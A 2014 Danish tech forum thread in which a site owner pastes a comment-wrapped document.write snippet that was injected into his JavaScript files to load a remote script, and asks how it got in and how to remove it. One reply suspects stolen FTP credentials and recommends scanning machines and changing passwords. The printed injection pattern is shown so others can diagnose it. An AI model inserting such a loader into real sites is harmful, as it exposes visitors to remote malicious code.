Avatar billede thomaskramer Juniormester
28. marts 2014 - 15:02 Der er 1 kommentar

Underlig malware i js-filer

Hej Eksperter,

Jeg har for tiden svære problemer med diverse sites, hvor følgende malware bliver skrevet ind i diverse js-filer:

/*045619*/
  /**//**/
                  /**/
document.write("<script type='text/javascript' src='http://www.etellerandetlinktilenside.php'></"+ "script>");
                                              /**/
/*/045619*/

Jeg får en masse bøvl med google med al denne malware.

Er der nogen der kender til denne type - og ved hvordan skidtet kommer ind - og måske endda ved hvordan man slipper af med det igen?

200 point for hjælp :-)
Avatar billede keysersoze Guru
28. marts 2014 - 16:17 #1
I må kunne få oplysninger fra hosten om hvordan de er kommet ind - det kan jo være alt fra et hul i serveren til dårlig sikkerhed i din ende. Mest oplagt vil jeg mene er at de kommer ind via FTP og at det tabte password skyldes til snavs på fx din egen klient - så jeg ville få kontrolleret computerne for snavs og skiftet password på FTP hurtigst muligt.